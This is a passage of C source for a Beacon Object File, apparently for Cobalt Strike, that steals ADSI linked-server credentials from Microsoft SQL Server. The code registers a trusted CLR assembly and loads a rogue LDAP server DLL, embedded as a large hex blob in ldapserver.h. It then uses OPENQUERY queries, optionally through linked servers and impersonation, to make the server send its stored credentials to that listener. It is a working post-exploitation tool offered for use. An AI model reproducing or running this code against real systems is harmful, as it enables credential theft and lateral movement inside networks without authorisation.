    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Obtaining ADSI credentials for \"%s\" on %s\n\n", adsiServer, server);
  } else {
    internal_printf( "[*] Obtaining ADSI credentials for \"%s\" on %s via %s\n\n", adsiServer, link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate statement handle\n");
    goto END;
  }

  if (IsModuleEnabled(stmt, "clr enabled", link, impersonate)) {
    internal_printf("[*] CLR is enabled\n");
  } else {
    internal_printf("[!] CLR is not enabled\n");
    goto END;
  }

  ret = ODBC32$SQLCloseCursor(stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to close cursor\n");
    goto END;
  }

  if (link != NULL) {
    if (IsRpcEnabled(stmt, link)) {
      internal_printf("[*] RPC out is enabled\n");
    } else {
      internal_printf("[!] RPC out is not enabled\n");
      goto END;
    }

    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }
  }

  if (AssemblyHashExists(stmt, LDAP_DLL_HASH, link, impersonate)) {
    internal_printf( "[!] Assembly hash already exists in sys.trusted_assesmblies\n");
    internal_printf("[*] Dropping existing assembly hash before continuing\n");

    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }

    if (!DeleteTrustedAssembly(stmt, LDAP_DLL_HASH, link, impersonate)) {
      internal_printf("[!] Failed to drop existing assembly hash\n");
      goto END;
    }
  } else {
    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }
  }

  if (!AddTrustedAssembly(stmt, dllPath, LDAP_DLL_HASH, link, impersonate)) {
    internal_printf("[!] Failed to add trusted assembly\n");
    goto END;
  }

  internal_printf("[*] Added SHA-512 hash for DLL to sys.trusted_assemblies with the name \"%s\"\n", dllPath);

  if (!DeleteTrustedAssemblyResources(stmt, assemblyName, function, TRUE, link, impersonate)) {
    internal_printf("[!] Failed to drop existing assembly and procedure\n");
    goto END;
  }

  internal_printf( "[*] Creating new LDAP server assembly with the name \"%s\"\n", assemblyName);
  CreateAssembly(stmt, assemblyName, LDAP_DLL_BYTES, link, impersonate);

  if (!AssemblyExists(stmt, assemblyName, link, impersonate)) {
    internal_printf("[!] Failed to create custom assembly\n");
    internal_printf("[*] Cleaning up...\n");
    DeleteTrustedAssembly(stmt, LDAP_DLL_HASH, link, impersonate);
    DeleteTrustedAssemblyResources(stmt, assemblyName, function, TRUE, link, impersonate);
    goto END;
  }

  internal_printf("[*] Loading LDAP server assembly into a new CLR runtime routine \"%s\"\n", function);
  CreateAssemblyStoredProc(stmt, assemblyName, function, TRUE, link, impersonate);

  ClearCursor(stmt);

  if (!AssemblyFunctionExists(stmt, "ldapAssembly.LdapSrv", link, impersonate)) {
    internal_printf("[!] Unable to load LDAP server assembly into custom CLR runtime routine\n");
    internal_printf("[*] Cleaning up...\n");
    DeleteTrustedAssembly(stmt, LDAP_DLL_HASH, link, impersonate);
    DeleteTrustedAssemblyResources(stmt, assemblyName, function, TRUE, link, impersonate);
    goto END;
  }

  internal_printf("[*] Created \"[%s].[ldapAssembly.LdapSrv].[%s]\"\n", assemblyName, function);

  ClearCursor(stmt);

  internal_printf("[*] Creating a second connection to the SQL server for threaded query\n");
  if (link == NULL) {
    dbc2 = ConnectToSqlServerAuth(&env2, server, database, user, password);
  } else {
    dbc2 = ConnectToSqlServerAuth(&env2, server, NULL, user, password);
  }

  if (dbc2 == NULL) {
    internal_printf("[!] Failed to create second connection\n");
    internal_printf("[*] Cleaning up...\n");
    DeleteTrustedAssembly(stmt, LDAP_DLL_HASH, link, impersonate);
    DeleteTrustedAssemblyResources(stmt, assemblyName, function, TRUE, link, impersonate);
    goto END;
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc2, &stmt2);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate second statement handle\n");
    goto END;
  }

  internal_printf("[*] Starting a local LDAP server on port %s\n", port);
  ThreadData data = {stmt2, function, port, link, impersonate};

  HANDLE hThread = KERNEL32$CreateThread(NULL, 0, (void *)RunThreadedQuery, &data, 0, NULL);
  if (hThread == NULL) {
    internal_printf("[!] Failed to create new thread\n");
    internal_printf("[*] Cleaning up...\n");
    DeleteTrustedAssembly(stmt, LDAP_DLL_HASH, link, impersonate);
    DeleteTrustedAssemblyResources(stmt, assemblyName, function, TRUE, link, impersonate);
    goto END;
  }

  internal_printf( "[*] Executing LDAP solication (this will fire some errors)...\n\n");

  if (link == NULL) {
    char *part1 = "SELECT * FROM OPENQUERY(\"";
    char *part2 = "\", 'SELECT * FROM ''LDAP://localhost:";
    char *part3 = "''')";

    size_t totalSize = MSVCRT$strlen(part1) + MSVCRT$strlen(adsiServer) + MSVCRT$strlen(part2) + MSVCRT$strlen(port) + MSVCRT$strlen(part3) + 1;
    trigger = (char *)intAlloc(totalSize);

    MSVCRT$strcpy(trigger, part1);
    MSVCRT$strncat(trigger, adsiServer, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, part2, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, port, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, part3, totalSize - MSVCRT$strlen(trigger) - 1);
  } else {
    char *part1 = "SELECT * FROM OPENQUERY(\"";
    char *part2 = "\", 'SELECT * FROM OPENQUERY(\"";
    char *part3 = "\", ''SELECT * FROM ''''LDAP://localhost:";
    char *part4 = "'''''')')";

    size_t totalSize = MSVCRT$strlen(part1) + MSVCRT$strlen(link) + MSVCRT$strlen(part2) + MSVCRT$strlen(adsiServer) + MSVCRT$strlen(part3) + MSVCRT$strlen(port) + MSVCRT$strlen(part4) + 1;
    trigger = (char *)intAlloc(totalSize);

    MSVCRT$strcpy(trigger, part1);
    MSVCRT$strncat(trigger, link, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, part2, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, adsiServer, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, part3, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, port, totalSize - MSVCRT$strlen(trigger) - 1);
    MSVCRT$strncat(trigger, part4, totalSize - MSVCRT$strlen(trigger) - 1);
  }

  HandleQuery(stmt, (SQLCHAR *)trigger, NULL, impersonate, FALSE);
  HandleQuery(stmt, (SQLCHAR *)trigger, NULL, impersonate, FALSE);

  KERNEL32$WaitForSingleObject(hThread, INFINITE);
  KERNEL32$CloseHandle(hThread);

  internal_printf("\n[*] LDAP server thread finished\n\n");
  PrintQueryResults(stmt2, TRUE);

  internal_printf("\n[*] Cleaning up...\n");
  DeleteTrustedAssembly(stmt, LDAP_DLL_HASH, link, impersonate);
  DeleteTrustedAssemblyResources(stmt, assemblyName, function, TRUE, link, impersonate);

END:
  intFree(dllPath);
  intFree(function);
  if (trigger != NULL)
    intFree(trigger);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
  if (stmt2 != NULL)
    ODBC32$SQLCloseCursor(stmt2);
  if (dbc2 != NULL)
    DisconnectSqlServer(env2, dbc2, stmt2);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *adsiServer;
  char *port;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);
  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  adsiServer = BeaconDataExtract(&parser, NULL);
  port = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  DumpAdsiCreds(server, database, link, impersonate, adsiServer, port, user, password);
  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/adsi/ldapserver.h
================================================
//
// This is the .NET assembly for an LDAP server in SQL byte format
//
char* LDAP_DLL_BYTES = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300265F83640000000000000000E00002210B010B00002A000000060000000000001E49000000200000006000000000001000200000000200000400000000000000040000000000000000A000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000D04800004B00000000600000B002000000000000000000000000000000000000008000000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E746578740000002429000000200000002A000000020000000000000000000000000000200000602E72737263000000B00200000060000000040000002C0000000000000000000000000000400000402E72656C6F6300000C000000008000000002000000300000000000000000000000000000400000420000000000000000000000000000000000490000000000004800000002000500A02D0000301B00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000133001002000000001000011026F190000060B1201280500000A2D091201280600000A2B0116000A2B00062A133001002000000001000011026F190000060B1201280500000A2D091201280600000A2B0116000A2B00062A1B30030002010000020000110072010000700A007E0700000A02730800000A0B076F0900000A00076F0A00000A0C086F0B00000A0D7203000070130572030000701306091204282B0000062611047B410000047E010000042D1314FE0602000006730C00000A80010000042B007E01000004280100002B16FE01130A110A2D570011047B410000047E020000042D1314FE0603000006730C00000A80020000042B007E02000004280200002B130711077B41000004176F0F00000A6F0300002B130511077B41000004186F0F00000A6F0300002B130600086F1000000A00076F1100000A00721700007011051106281200000A0A00DE0E13080011086F1300000A0A00DE00000613092B0011092A00000110000000000700E4EB000E13000001133005005D00000003000011000316FE01130411042D140002722700007072010000706F1400000A100000026F1500000A0A06185B8D140000010B160C2B1A000708185B0208186F1600000A1F10281700000A9C000818580C0806FE04130411042DDC070D2B00092A00000013300300500000000400001100028E69185A731800000A0A00020D1613042B24091104910B0006722B000070078C14000001281900000A6F1A00000A26001104175813041104098E69FE04130511052DCF066F1300000A0C2B00082A1B300200890000000500001100170A72010000700B00026F1B00000A13042B3D11046F1C00000A0C000708281D00000A8C18000001281E00000A0B061E5D16FE0116FE01130511052D0E00077227000070281F00000A0B000617580A0011046F2000000A130511052DB6DE1D110475190000011306110614FE01130511052D0811066F2100000A00DC00076F2200000A0D2B00092A00000001100000020012004E60001D00000000133005007E0000000600001100021F7FFE02130511052D1500178D14000001130611061602D29C110613042B5A0002282300000A0A068E69D20B2B1800071759D20B060717599116FE01130511052D03002B0E000716FE0416FE01130511052DDB072080000000580C1707588D140000010D091608D29C0616091707282400000A000913042B0011042A0000133005005D0000000700001100041754160A0203911D6317FE0116FE01130411042D37000203911F7F5F0B1A8D140000010C02031758081607282400000A0008280400002B280500002B16282700000A0A04254A075854002B09000203911F7F5F0A00060D2B00092A000000133004006D0000000800001100031754160A178D140000010B020716176F2800000A260716911D6317FE0116FE01130511052D34000716911F7F5F0C088D140000010D020916086F2800000A2609280400002B280500002B16282700000A0A03254A085854002B09000716911F7F5F0A000613042B0011042A000000133002001200000009000011000203280600002B282A00000A0A2B00062A0000133001000B0000000A000011027B3E0000040A2B00062A2202037D3E0000042A13300300220000000B00001100178D140000010B071602280B0000069C07732B00000A1B282C00000A0A2B00062A0000133002000E0000000C0000110002280B0000061C630A2B00062A0000133002000F0000000D0000110002280B0000061F1F5F0A2B00062A00133002000F0000000E0000110002280B0000061F1F5F0A2B00062A0013300200100000000A0000110002280B0000061F1F5FD20A2B00062A8202282D00000A00000203D204282E00000A1B62581F4058D2280C00000600002A7602282D00000A00000203D204282E00000A1B6258D2280C00000600002A8A02282D00000A0000020304282E00000A1B6258208000000058D2280C00000600002A0000133001000C0000000F000011000273160000060A2B00062A4A02282D00000A00000203280C00000600002A0013300100110000000C00001100027B3F0000046F0E0000060A2B00062A00000013300100110000001000001100027B3F0000046F0D0000060A2B00062A00000013300200380000001100001100027B3F0000046F0E00000617FE0116FE010B072D1400027B3F0000046F10000006732F00000A0A2B0C1202FE150100001B080A2B00062A13300200380000001200001100027B3F0000046F0E00000616FE0116FE010B072D1400027B3F0000046F0F000006733000000A0A2B0C1202FE150400001B080A2B00062A13300200380000001300001100027B3F0000046F0E00000618FE0116FE010B072D1400027B3F0000046F11000006733100000A0A2B0C1202FE150500001B080A2B00062ABA02168D140000017D4000000402733200000A7D4100000402282D00000A000002030473120000067D3F000004002AEE02168D140000017D4000000402733200000A7D4100000402282D00000A000002030473120000067D3F00000402020528260000067D40000004002ABA02168D140000017D4000000402733200000A7D4100000402282D00000A000002030473130000067D3F000004002AEE02168D140000017D4000000402733200000A7D4100000402282D00000A000002030473130000067D3F00000402020528260000067D40000004002ABA02168D140000017D4000000402733200000A7D4100000402282D00000A000002030473140000067D3F000004002AEE02168D140000017D4000000402733200000A7D4100000402282D00000A000002030473140000067D3F00000402020528260000067D40000004002AA202168D140000017D4000000402733200000A7D4100000402282D00000A000002037D3F000004002A1E02282D00000A2A4E027B42000004036F230000066F3300000A002A000013300500CD00000014000011140C732D0000060D0009733400000A7D42000004027B3F0000046F0D00000616FE01130511052D2300027B41000004082D0F09FE062E000006733500000A0C2B00086F3600000A00002B1400097B42000004027B400000046F3300000A0000097B420000046F3700000A28070000060A17068E6958097B420000046F3700000A588D140000010B0716027B3F0000046F0B0000069C06160717068E69282400000A00097B420000046F3800000A160717068E6958097B420000046F3700000A282400000A000713042B0011042A00000013300200200000001500001100022825000006D00800001B283900000A283A00000AA50800001B0A2B00062A13300500D90000001600001100027B3F0000046F0E00000616FE0116FE010C083AA100000000027B3F0000046F0F00000617FE0116FE010C082D1800027B4000000416283B00000A8C200000010B3890000000027B3F0000046F0F00000618FE0116FE010C082D41001A8D140000010A027B4000000416061A027B400000048E6959027B400000048E69282400000A0006280400002B280500002B16282700000A8C180000010B2B3A00283C00000A027B4000000416027B400000048E696F3D00000A0B2B1D00283C00000A027B4000000416027B400000048E696F3D00000A0B2B00072A00000013300300060100001700001100036F3E00000AD012000001283900000A283F00000A16FE010B072D1700283C00000A0374120000016F4000000A0A38D0000000036F3E00000AD018000001283900000A283F00000A16FE010B072D1C0003A518000001282300000A280400002B280500002B0A3898000000036F3E00000AD020000001283900000A283F00000A16FE010B072D0F0003A520000001284100000A0A2B6D036F3E00000AD014000001283900000A283F00000A16FE010B072D1500178D140000010C081603A5140000019C080A2B3C036F3E00000AD00900001B283900000A283F00000A16FE010B072D0A0003740900001B0A2B167239000070036F3E00000A281900000A734200000A7A062A000013300200170000001800001100027B41000004166F0F00000A6F0700002B0A2B00062A9A021F1017281E0000060000027B410000041816038C18000001731F0000066F4300000A00002A2E020328220000060000002A00001330040032000000190000110002169128150000060A160B0217120128080000060C02160807581758282C000006166F0F00000A74090000020D2B00092A00001B300400810000001A0000110000178D140000010A020616176F2800000A0B0716FE01130711072D4F0006169128150000060C160D0212032809000006130411048D1400000113050211051611046F2800000A26030873290000065103507B410000041105161104282C0000066F4400000A00171306DE1100DE05260000DE00000314511613062B000011062A00000001100000000001006E6F00051300000113300500A60000001B00001100733200000A0A38850000000002039128150000060B0317581001160C0203120228080000060D03085810010773290000061304076F0D0000062C090916FE0216FE012B011700130611062D150011040203030958282C0000067D41000004002B20001104098D140000017D40000004020311047B400000041609282400000A00000611046F4300000A000309581001000304FE04130611063A6EFFFFFF0613052B0011052A000042534A4201000100000000000C00000076342E302E33303331390000000005006C000000940B0000237E0000000C0000F809000023537472696E677300000000F815000068000000235553006016000010000000234755494400000070160000C004000023426C6F620000000000000002000001571DA209090E000000FA25330016000001000000220000000A000000420000002E0000003200000044000000390000000A0000001B000000030000000C0000000D00000009000000010000000300000001000000010000000700000000000A0001000000000006008A0083000600910083000600A0038D030600DE03D4030600CB04B0040600E20483000600A10582050600500630060600700630060600A80683000600D60630060A004F0744070A00750762070A00870762070A00A10762070E00D107C5070600DC07B004060012088300060029088300060046088300060055088300060070086408060085088D030600B30883000600C90883000600E20883000600EF0883000600F608830006004F09830006006A09830006006F0983000600D80083000600A80964080600D809830000000000010000000000010001008101100019002100050001000100010100002E00210009000300040001010000370021000900080004000101000049002100090028000400810110005700210005003E000400010010005D00210005003E000B00010010006100210005003F001700010010006F002100200042002700030110001F090000050042002D001100AF06E5011100FE06E50106069D000F005680A50012005680AF0012005680BB0012005680C300120006069D000F005680CB002A005680D8002A005680E0002A005680E8002A005680F2002A005680FE002A00568003012A00568014012A00568025012A0056802E012A00568033012A0056803E012A0056804A012A00568055012A0056805E012A00568067012A00568071012A0056807A012A0056807E012A0056808C012A0056809C012A005680A6012A005680B5012A005680BF012A005680C7012A005680D7012A005680E5012A005680F3012A00568001022A00568011022A00568021022A0006069D000F0056802B02B50056803702B50056804402B50056805202B50056806002B50056807202B50056808302B50056809902B5005680A702B5005680B602B5005680C102B5005680CD02B5005680D802B5005680E402B5005680F402B50056800503B50056801403B50056802403B50056803303B50056804303B50056805403B50001005B041F010100A50439010400AA043D010600D204410106003209C003A82000000000960096000A00010050200000000091009906DF0102007C20000000009100F106DF010300C8210000000096006903B900040034220000000096007B03C00006009022000000009600A903C60007003823000000009600B603CC000800C423000000009600C503D20009003024000000009600C503DB000C00AC24000000009600E503E3000E00CC24000000008608EC03E9001000E324000000008308F803ED001000EC240000000086080404F20011001C250000000086081604F600110038250000000086082004FB00110054250000000086082D040001110070250000000086083F04E90011008C250000000086184F0405011100AD250000000086184F040C011300CB250000000086184F0413011500F02500000000960055041901170008260000000081184F04ED0018001C260000000086081604F60019003C260000000086080404F20019005C260000000086082D0449011900A026000000008608200452011900E4260000000086083F045B01190028270000000086184F040501190057270000000086184F0463011B0093270000000086184F040C011E00C2270000000086184F046B012000FE270000000086184F04130123002D280000000086184F047301250069280000000084184F047A012800B028000000008600ED04800129008C29000000008600F60485012900B829000000008600F6048B012900A02A000000008100ED048F012900B42B0000000086080105AF012A00D72B0000000086184F04B3012A00FE2B0000000081184F047A012B000C2C0000000096000F05B8012C004C2C0000000096001B05BF012D00EC2C0000000091002A05C8012F0092280000000086184F04DB0132009A280000000086003709C703320000000100440500000100A60600000100A606000001004905101002004D05000001005C05000001006205000001006705000001005C05000002006E0502000300750500000100AE0502000200750500000100B50500000200BB0500000100BD0500000100C30500000200CD0500000100D80500000200CD0500000100E10500000200CD0500000100E90500000100E90500000100C30500000200F10500000100C30500000200F10500000300BD0500000100D80500000200F10500000100D80500000200F10500000300BD0500000100FF0500000200F10500000100FF0500000200F10500000300BD05000001000B0600000100BD05000001000F06000001000B06000001005C0500000100AE05020002001906000001005C0500000200200600000300670500000100A60639004F04DB0141004F04B30149004F04DB0159004F04DB010C002507F5010C003707F20061005907040269004F04080269008107DB01690091070F027100AF07140214004F0421028100EA0727028100EE073E021C00FE07580271000708DB0169000D08DB0191001908620209002008690291003308810291003B08AF0191004B088702A9005D088D02B1004F04B301910019089D02B1007E08A30219009108B402B9009F088B01A900AB08B9029100B908BE029100B908C402B900C008F200C900D508DB019100DD086902D100ED04CC00D900FC08D60281000609EF0281000E090303D100AB0810032100160920038100E50333039100B908400319004F04510319001B09570309004F04DB01A9005D0871030C004F047F0324004F047F032C004F047F031C004F04DB0134004609D30334004F04DB013C004F0421021C005809E40334006009AF0134000E09EE03F10081090904A90093091004D1009E091C040901B10923040901BA0929040900C4093804F100CC093D040901ED044504D100ED044B0411014F0454041C00F2097F031C004609D303080010001600080014001B0002001500D90108001800200008001C002500080024001600080028001B0008002C002000080030002500080034002E0008003800330008003C003800080040003D0008004400420008004800470008004C004C00080050005100080054005600080058005B0008005C006000080060006500080064006A00080068006F0008006C007400080070007900080074007E0008007800830008007C008800080080008D0008008400920008008800970008008C009C0008009000A10008009400A60008009800AB0008009C00B0000800A40016000800A8001B000800AC0020000800B00025000800B4002E000800B80033000800BC0079000800C00038000800C4003D000800C80042000800CC0047000800D0004C000800D40051000800D80056000800DC005B000800E00060000800E40065000800E8006A000800EC008D000800F00092000800F4009700210023001B002E00130096042E001B009F04400023001B00410023001B00600023001B00430123001B00600123001B00800123001B00C10723001B00FA016D029302A902CA02E1021703280349034D035C03620367036C0376037B0385039C03B203F4031704310459046504690472048004070001000800070009000C0000007404220100007C04260100008A042A01000090042F0100004900340100009904220100008A042A0100007C042601000049009501000090049E0100009904A70100003A05D50102000B00030001000C00030002000D00050002000E00070002000F000900020010000B00020011000D00020017000F0002001800110002001900130002001A00150002001B001700020027001900EE01190251029503AC03CD03DD03060451040480000000000000000000000000000000008E06000004000000000000000000000001007A000000000004000000000000000000000001008300000000000400000000000000000000000100B907000000000A000800000000004900FF041B0039021D00390248005E024B00FF024D00FF0253005E024800610400000000003C4D6F64756C653E006C6461705365727665722E646C6C004C646170537276006C646170417373656D626C7900546167436C61737300556E6976657273616C4461746154797065004C6461704F7065726174696F6E005574696C7300546167004C646170417474726962757465004C6461705061636B6574006D73636F726C69620053797374656D004F626A65637400456E756D006C697374656E0076616C75655F5F00556E6976657273616C004170706C69636174696F6E00436F6E74657874005072697661746500456E644F66436F6E74656E7400426F6F6C65616E00496E746567657200426974537472696E67004F63746574537472696E67004E756C6C004F626A6563744964656E746966696572004F626A65637444657363726970746F720045787465726E616C005265616C00456E756D65726174656400456D6265646465645044560055544638537472696E670052656C6174697665005265736572766564005265736572766564320053657175656E636500536574004E756D65726963537472696E67005072696E7461626C65537472696E6700543631537472696E6700566964656F746578537472696E6700494135537472696E670055544354696D650047656E6572616C697A656454696D650047726170686963537472696E670056697369626C65537472696E670047656E6572616C537472696E6700556E6976657273616C537472696E6700436861726163746572537472696E6700424D50537472696E670042696E64526571756573740042696E64526573706F6E736500556E62696E6452657175657374005365617263685265717565737400536561726368526573756C74456E74727900536561726368526573756C74446F6E6500536561726368526573756C745265666572656E6365004D6F6469667952657175657374004D6F64696679526573706F6E7365004164645265717565737400416464526573706F6E73650044656C526571756573740044656C526573706F6E7365004D6F64696679444E52657175657374004D6F64696679444E526573706F6E736500436F6D706172655265717565737400436F6D70617265526573706F6E7365004162616E646F6E5265717565737400457874656E6465645265717565737400457874656E646564526573706F6E736500496E7465726D656469617465526573706F6E736500537472696E67546F42797465417272617900427974654172726179546F537472696E670053797374656D2E436F6C6C656374696F6E730042697441727261790042697473546F537472696E6700496E74546F4265724C656E677468004265724C656E677468546F496E740053797374656D2E494F0053747265616D00526570656174006765745F54616742797465007365745F54616742797465006765745F4973436F6E7374727563746564006765745F436C617373006765745F4461746154797065006765745F4C6461704F7065726174696F6E006765745F436F6E7465787454797065002E63746F72005061727365003C546167427974653E6B5F5F4261636B696E674669656C640054616742797465004973436F6E737472756374656400436C61737300446174615479706500436F6E7465787454797065005F7461670056616C75650053797374656D2E436F6C6C656374696F6E732E47656E65726963004C6973746031004368696C6441747472696275746573004E756C6C61626C6560310047657442797465730047657456616C75650054006765745F4D65737361676549640050617273655061636B65740054727950617273655061636B657400506172736541747472696275746573004D657373616765496400706F727400686578007472696D576869746573706163650062797465730062697473006C656E677468006F66667365740062657242797465436F756E740053797374656D2E52756E74696D652E496E7465726F705365727669636573004F75744174747269627574650073747265616D007374756666006E0076616C7565006F7065726174696F6E00697353657175656E636500646174615479706500636F6E746578740074616742797465006973436F6E737472756374656400636F6E746578745479706500746167006D6573736167654964007061636B65740063757272656E74506F736974696F6E0053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465006C646170536572766572003C6C697374656E3E625F5F30006F0046756E636032004353243C3E395F5F436163686564416E6F6E796D6F75734D6574686F6444656C65676174653200436F6D70696C657247656E657261746564417474726962757465003C6C697374656E3E625F5F31004353243C3E395F5F436163686564416E6F6E796D6F75734D6574686F6444656C6567617465330047657456616C75654F7244656661756C74006765745F48617356616C75650053797374656D2E4E657400495041646472657373004C6F6F706261636B0053797374656D2E4E65742E536F636B657473005463704C697374656E657200537461727400546370436C69656E7400416363657074546370436C69656E74004E6574776F726B53747265616D0047657453747265616D0053797374656D2E436F72650053797374656D2E4C696E7100456E756D657261626C650049456E756D657261626C65603100416E790053696E676C654F7244656661756C74006765745F4974656D00436C6F73650053746F7000537472696E6700466F726D617400546F537472696E6700457863657074696F6E005265706C616365006765745F4C656E677468004279746500537562737472696E6700436F6E7665727400546F427974650053797374656D2E5465787400537472696E674275696C64657200417070656E640049456E756D657261746F7200476574456E756D657261746F72006765745F43757272656E7400546F496E74333200496E74333200436F6E636174004D6F76654E6578740049446973706F7361626C6500446973706F7365005472696D00426974436F6E7665727465720042756666657200417272617900426C6F636B436F7079005265766572736500546F4172726179005265616400476574003C3E635F5F446973706C6179436C61737332006C697374003C47657442797465733E625F5F300041646452616E676500416374696F6E603100466F7245616368006765745F436F756E7400547970650052756E74696D655479706548616E646C65004765745479706546726F6D48616E646C65004368616E67655479706500546F426F6F6C65616E00456E636F64696E67006765745F5554463800476574537472696E670047657454797065006F705F457175616C69747900496E76616C69644F7065726174696F6E457863657074696F6E00416464000000000100133C0075006E006B006E006F0077006E003E00000F7B0030007D003A007B0031007D0000032000000D7B0030003A00780032007D00002B4E006F007400680069006E006700200066006F0075006E006400200066006F00720020007B0030007D000000000063008CD6EC38324589207D1084EFC3030008B77A5C561934E0890400010E080206080306110C040000000004010000000402000000040300000003061110040400000004050000000406000000040700000004080000000409000000040A000000040B000000040C000000040D000000040E000000040F0000000410000000041100000004120000000413000000041400000004150000000416000000041700000004180000000419000000041A000000041B000000041C000000041D000000041E000000030611140600021D050E020500010E1D050500010E120D0500011D0508080003081D0508100807000208121110080500020E0E0803200005042001010503200002042000110C042000111004200011140620020111140206200201111002052002010502050001121C050206050328000503280002042800110C042800111004280011140306121C03061D0507061512150112200820001511190111140820001511190111100720001511190105072003011114021C072003011110021C0620030105021C05200101121C0420001D05053001001E000320001C0520011D051C082800151119011114082800151119011110072800151119010503200008042001010806000112241D050800020212111012240C00031512150112201D050808032800080101032000010500010212200806151229021220020615111901111404200013000907020215111901111403061231062002011231080420001239042000123D0715122902122002052002011C181110010202151245011E00151229021E0002040A011220121001021E00151245011E00151229021E000206151215011220052001130008030A010E0600030E0E1C1C0320000E13070B0E12351239123D12240E0E1220124D0E020520020E0E0E0520020E0808050002050E08090705081D05081D05020500020E0E1C05200112590E0A07061259050E1D050802042000125D040001081C0500020E1C1C0500020E0E0E0B0707080E1C0E125D0212650A000501127108127108080D07071D0505081D051D05021D050F100101151245011E00151245011E00030A01050C1001011D1E00151245011E00060002081D050808070508081D050802072003081D0508080A0706081D05081D0508020C100102151245011E001E00080800010E151245010E0307010E03070105052001011D050420010208050702021D05040701110C040701111004070111140400010502040701121C030701020520010113000F070315111901111402151119011114061511190111100F0703151119011110021511190111100515111901050D07031511190105021511190105060615121501050520010112200515121501050920010115124501130006151275011220092001011512750113000520001D13001107061D051D0515127501122012281D0502021E000600011279117D0600021C1C12790407011E00060002021D05080500001280850720030E1D0508080607031D051C02042000127907000202127912790520011D050E0500011D0502021D05042001010E0707031D05021D05030A010803070108080704121C080812240D07081D0508121C08081D050202150707151215011220121C08081224151215011220020801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010000F848000000000000000000000E490000002000000000000000000000000000000000000000000000004900000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058600000540200000000000000000000540234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004B4010000010053007400720069006E006700460069006C00650049006E0066006F0000009001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000040000F00010049006E007400650072006E0061006C004E0061006D00650000006C006400610070005300650072007600650072002E0064006C006C00000000002800020001004C006500670061006C0043006F00700079007200690067006800740000002000000048000F0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000006C006400610070005300650072007600650072002E0064006C006C0000000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000